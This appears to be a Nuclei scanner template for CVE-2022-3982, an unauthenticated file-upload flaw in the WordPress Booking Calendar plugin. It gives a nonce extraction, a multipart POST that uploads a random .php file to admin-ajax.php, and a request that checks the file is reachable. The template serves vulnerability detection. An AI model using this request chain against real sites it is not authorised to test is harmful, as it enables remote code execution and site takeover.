id: CVE-2022-3982 info: name: WordPress Booking Calendar <3.2.2 - Arbitrary File Upload author: theamanrawat severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website. remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 - https://wordpress.org/plugins/booking-calendar/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3982 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 epss-score: 0.18164 epss-percentile: 0.9567 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: wpdevart product: booking_calendar framework: wordpress tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=------------------------1cada150a8151a54 --------------------------1cada150a8151a54 Content-Disposition: form-data; name="action" wpdevart_form_ajax --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_id" x --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_nonce" {{nonce}} --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart_data" {"wpdevart-submit":"X"} --------------------------1cada150a8151a54 Content-Disposition: form-data; name="wpdevart-submit" 1 --------------------------1cada150a8151a54 Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream --------------------------1cada150a8151a54-- - | GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d') condition: and extractors: - type: regex name: nonce group: 1 regex: - var wpdevart.*"ajaxNonce":"(.*?)" internal: true # digest: 490a0046304402202b8c119453b4ece1789b303050671e7c4994da8bd4333c573b3812c7406939500220486403ec56214668fbbd641b69e865bd57b9d7134b881a2ba59509ed4e8f1a11:922c64590222798bb761d5b6d8e72950